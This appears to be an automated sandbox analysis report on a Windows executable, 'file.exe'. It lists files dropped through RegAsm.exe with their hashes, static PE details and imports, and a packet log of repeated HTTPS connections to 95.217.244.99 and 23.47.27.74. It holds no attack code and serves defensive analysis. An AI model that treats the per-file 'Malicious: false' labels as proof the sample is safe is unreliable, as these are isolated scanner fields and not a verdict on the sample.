Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468449502596563
Encrypted:	false
SSDEEP:	6144:XzZfpi6ceLPx9skLmb0fCZWSP3aJG8nAgeiJRMMhA2zX4WABluuNbjDH5SX:DZHtCZWOKnMM6bFp9j4X
MD5:	D5A0E9AD072A6180752214234D002D53
SHA1:	E9C7F529E0D555CD0ABBF42235034E53A296D450
SHA-256:	33A91F9B262B1459384817B1E295289AF1E6EB1803C1F11E0D8663E3C0A3B599
SHA-512:	D67882CFDAD2EF31D03D11A4A7A67E3FEB2D02C035F99665677E68A548E2D6DF1755F09B502B46BE944E98BA365B127062FB2331AF03620F33AAD8B75F30ADFE
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmjA..................................................................................................................................................................................................................................................................................................................................................z...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.3528127473226785
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'135'104 bytes
MD5:	c7cb10eadcca31c88538f972fd657590
SHA1:	9b09cdc280601e63579ae2cb64d863a0419d971c
SHA256:	fabac53ffc7381edddcaddca2c9b2d647dd30a2e66d62c3cca720349f1e66d4e
SHA512:	9d8efe2b42c5cc99fdc807a9b3d6628c39825b257aef9e81d4b9396b5d3b730307478c047764631fc6b646895c7e92052326dff6e1740fd2ba4eef7904224bd6
SSDEEP:	24576:f26YE2EStbC19xq1a9GeWTaaQgUkSMnHJa:fHp19xq1a9QQMHJa
TLSH:	EA35AF3139C49171EEE220B743ECFA3A866DE0B0071556CF56D85AEED7206C27F32696
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........B............C.......C...9...C.......R!......R!......C...............R!......c"......c"......Rich....................PE..L..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4011d6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6627F55A [Tue Apr 23 17:52:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	5822c854edef0b68a31f6b397cb24414

Entrypoint Preview

Instruction
jmp 00007FEED9463795h
jmp 00007FEED947CCB3h
jmp 00007FEED9462D26h
jmp 00007FEED946BD2Bh
jmp 00007FEED9456AF2h
jmp 00007FEED9438B31h
jmp 00007FEED94C3DBCh
jmp 00007FEED9456FEEh
jmp 00007FEED947DA73h
jmp 00007FEED94CB516h
jmp 00007FEED943F6D5h
jmp 00007FEED94648DBh
jmp 00007FEED943E38Ch
jmp 00007FEED9474858h
jmp 00007FEED944FEEDh
jmp 00007FEED9433B4Fh
jmp 00007FEED949A659h
jmp 00007FEED943D3EBh
jmp 00007FEED9433130h
jmp 00007FEED94B8BB4h
jmp 00007FEED94332E6h
jmp 00007FEED94781BFh
jmp 00007FEED9494C0Dh
jmp 00007FEED9453D9Eh
jmp 00007FEED9486255h
jmp 00007FEED945E4BAh
jmp 00007FEED946C8F0h
jmp 00007FEED9436CE3h
jmp 00007FEED9490A1Ch
jmp 00007FEED94C6B20h
jmp 00007FEED944E24Dh
jmp 00007FEED9464D43h
jmp 00007FEED949A61Fh
jmp 00007FEED94C10AAh
jmp 00007FEED94B31C2h
jmp 00007FEED94AD755h
jmp 00007FEED94503E2h
jmp 00007FEED946C80Dh
jmp 00007FEED9485A34h
jmp 00007FEED9485A1Bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x112230	0x50	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x114000	0x49b0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc6d30	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xc6c48	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x112000	0x230	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb86a1	0xb8800	6a7ff7ac5bb6031b8ac6fa2065774774	False	0.3300966505758808	data	5.80913579150109	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xba000	0x14d20	0x14e00	1dd46cd5806aaec22e69631cae5111cb	False	0.2869924214071856	data	3.7005670159036304	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcf000	0x42be8	0x41000	5e6bc803e68e630d83e0a62d97d40250	False	0.8082557091346154	data	7.2104998343976305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x112000	0xd2a	0xe00	d909f99d190ed51087ee9eaa1a3ac979	False	0.33705357142857145	dBase III DBT, version number 0, next free block index 1123504, 1st item "\330$\021"	4.446610566492018	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg	0x113000	0x10e	0x200	883e59e697a12b05d2e5f5b8b4904140	False	0.03515625	data	0.11055713125913882	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x114000	0x56b2	0x5800	59e0133c856eec43465830f270aa49a2	False	0.6329456676136364	data	6.036515098733131	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	RegEnableReflectionKey
SHELL32.dll	DragFinish
KERNEL32.dll	CreateFileW, HeapSize, VirtualProtectEx, FormatMessageA, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, LocalFree, GetLocaleInfoEx, EncodePointer, DecodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, GetProcessHeap, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, GetCurrentThread, HeapAlloc, HeapFree, GetFileType, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, SetConsoleCtrlHandler, GetTimeZoneInformation, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, WriteConsoleW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 21:43:55.812483072 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:55.812509060 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:55.812576056 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:55.825474024 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:55.825489044 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.067856073 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.067967892 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:56.294295073 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:56.294320107 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.294620037 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.294684887 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:56.308804035 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:56.356112957 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.584300995 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.584330082 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.584347010 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.584378958 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:56.584393978 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.584474087 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:56.703552008 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.703609943 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.703680992 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:56.703711987 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.703739882 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:56.703753948 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:56.723917961 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.724031925 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:56.724037886 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.724085093 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:56.724132061 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.724184036 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:56.724652052 CEST	49699	443	192.168.2.6	23.47.27.74
Apr 23, 2024 21:43:56.724667072 CEST	443	49699	23.47.27.74	192.168.2.6
Apr 23, 2024 21:43:56.751919031 CEST	49701	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:56.751981974 CEST	443	49701	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:56.752067089 CEST	49701	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:56.752485991 CEST	49701	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:56.752506018 CEST	443	49701	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:57.433432102 CEST	443	49701	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:57.433532000 CEST	49701	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:57.437551975 CEST	49701	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:57.437580109 CEST	443	49701	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:57.437876940 CEST	443	49701	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:57.437942028 CEST	49701	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:57.438385010 CEST	49701	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:57.480127096 CEST	443	49701	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:57.979173899 CEST	443	49701	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:57.979269028 CEST	49701	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:57.979331017 CEST	443	49701	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:57.979367018 CEST	443	49701	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:57.979415894 CEST	49701	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:57.979450941 CEST	49701	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:57.982302904 CEST	49701	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:57.982332945 CEST	443	49701	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:57.984545946 CEST	49705	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:57.984621048 CEST	443	49705	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:57.984735966 CEST	49705	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:57.985004902 CEST	49705	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:57.985030890 CEST	443	49705	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:58.452333927 CEST	443	49705	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:58.452435970 CEST	49705	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:58.453320026 CEST	49705	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:58.453341961 CEST	443	49705	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:58.465682983 CEST	49705	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:58.465725899 CEST	443	49705	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:59.322225094 CEST	443	49705	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:59.322294950 CEST	443	49705	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:59.322319031 CEST	49705	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:59.322385073 CEST	49705	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:59.322607994 CEST	49705	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:59.322647095 CEST	443	49705	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:59.324251890 CEST	49708	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:59.324289083 CEST	443	49708	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:59.324368000 CEST	49708	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:59.324656010 CEST	49708	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:59.324665070 CEST	443	49708	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:59.760752916 CEST	443	49708	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:59.760893106 CEST	49708	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:59.761579037 CEST	49708	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:59.761590004 CEST	443	49708	95.217.244.99	192.168.2.6
Apr 23, 2024 21:43:59.768466949 CEST	49708	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:43:59.768481970 CEST	443	49708	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:00.602430105 CEST	443	49708	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:00.602446079 CEST	443	49708	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:00.602487087 CEST	49708	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:00.602502108 CEST	443	49708	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:00.602514029 CEST	443	49708	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:00.602518082 CEST	49708	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:00.602557898 CEST	49708	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:00.602746010 CEST	49708	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:00.602757931 CEST	443	49708	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:00.604509115 CEST	49711	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:00.604604006 CEST	443	49711	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:00.604739904 CEST	49711	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:00.605001926 CEST	49711	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:00.605035067 CEST	443	49711	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:01.037609100 CEST	443	49711	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:01.037683010 CEST	49711	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:01.038559914 CEST	49711	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:01.038589001 CEST	443	49711	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:01.040556908 CEST	49711	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:01.040580988 CEST	443	49711	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:01.858293056 CEST	443	49711	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:01.858407974 CEST	443	49711	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:01.858489037 CEST	49711	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:01.858530045 CEST	443	49711	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:01.858550072 CEST	49711	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:01.858555079 CEST	443	49711	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:01.858572006 CEST	49711	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:01.858603001 CEST	49711	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:01.859128952 CEST	49711	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:01.859148026 CEST	443	49711	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:01.980434895 CEST	49712	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:01.980525970 CEST	443	49712	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:01.980600119 CEST	49712	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:01.980891943 CEST	49712	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:01.980920076 CEST	443	49712	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:02.412424088 CEST	443	49712	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:02.412559986 CEST	49712	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:02.413204908 CEST	49712	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:02.413218975 CEST	443	49712	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:02.415143967 CEST	49712	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:02.415157080 CEST	443	49712	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:02.415241003 CEST	49712	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:02.415258884 CEST	443	49712	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:02.969259977 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:02.969300985 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:02.969399929 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:02.969708920 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:02.969717979 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:03.297586918 CEST	443	49712	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:03.297657013 CEST	443	49712	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:03.297693968 CEST	49712	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:03.297725916 CEST	49712	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:03.298729897 CEST	49712	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:03.298746109 CEST	443	49712	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:03.437211990 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:03.437324047 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:03.437979937 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:03.437988997 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:03.439891100 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:03.439897060 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.176675081 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.176713943 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.176736116 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.176822901 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.176841974 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.176886082 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.176914930 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.282623053 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.282649994 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.282725096 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.282752991 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.282793999 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.433588028 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.433620930 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.433773041 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.433793068 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.433840990 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.544231892 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.544276953 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.544410944 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.544437885 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.544481039 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.622855902 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.622893095 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.623032093 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.623069048 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.623116016 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.674757004 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.674784899 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.674904108 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.674927950 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.675013065 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.721574068 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.721606016 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.721710920 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.721723080 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.721784115 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.763271093 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.763295889 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.763518095 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.763534069 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.763607025 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.809232950 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.809262037 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.809376955 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.809393883 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.809438944 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.855694056 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.855725050 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.855835915 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.855855942 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.855925083 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.892637014 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.892662048 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.892743111 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.892780066 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.892796040 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.892908096 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.921749115 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.921777964 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.921905994 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.921926022 CEST	443	49713	95.217.244.99	192.168.2.6
